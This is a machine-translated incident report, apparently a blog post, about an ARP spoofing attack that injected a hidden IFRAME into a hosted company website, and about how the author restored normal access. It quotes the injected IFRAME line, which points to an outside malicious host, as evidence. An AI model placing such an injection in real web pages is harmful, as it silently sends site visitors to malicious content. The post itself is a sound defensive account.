Solutions to ARP attacks on servers

Source: Internet
Author: User
Tags hosting server hosting

1.Attack Phenomenon

5Month16Day19:00Left and Right, get a message on the way home from work, the company's website access is abnormal, the exception is as follows

A)IE7Open all websitesHtmlThe page becomes a file download, and the website cannot be opened normally

B)IE7Do not useHttp1.1You can open the website, but the source file header is embedded1ItemsIFRAME


IFRAMEContent:<IFRAME src = http://xindizhi88.com/10.htm width = 20 Height = 0 frameborder = 0> </iframe>

GoogleBaidu finds that the server has receivedARPAttack

Http://www.google.cn/search? Sourceid = navclient & HL = ZH-CN & Ie = UTF-8 & rlz = 1t4gglj_zh-cn248cn249 & Q = % 22xindizhi88% 2 ECOM % 22

Http://www.baidu.com? WD = % 22xindizhi88% 2 ECOM % 22 & CL = 3

2.Attack Solution

A)InstallationARPFirewall software

I used it here.360Security guard and360arpFirewall. The effect is good, and the access is normal. At this time19:50.Whole spent50Minutes. We also foundARPAttack source.

B)FindARPAttack Source killing

Because it is a server hosting service, I will send the information I found here to the technical staff of the hosting equipment room.21:00Receive IDC notificationsARPThe attack source has been processed. The server is actually normal.

3.References

A)One rowCodeTemporary solutionIFRAMETrojan:Http://www.foloda.com.cn/BLOG/article.asp? Id = 70

4.QuiltARPReflection after attack

A)What kind of security software should I install on a general server?

I.Anti-Virus Software

II.DefenseDDoSAttack Software

III.DefenseARPAttack Software

IV.And...

You may give more comments.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.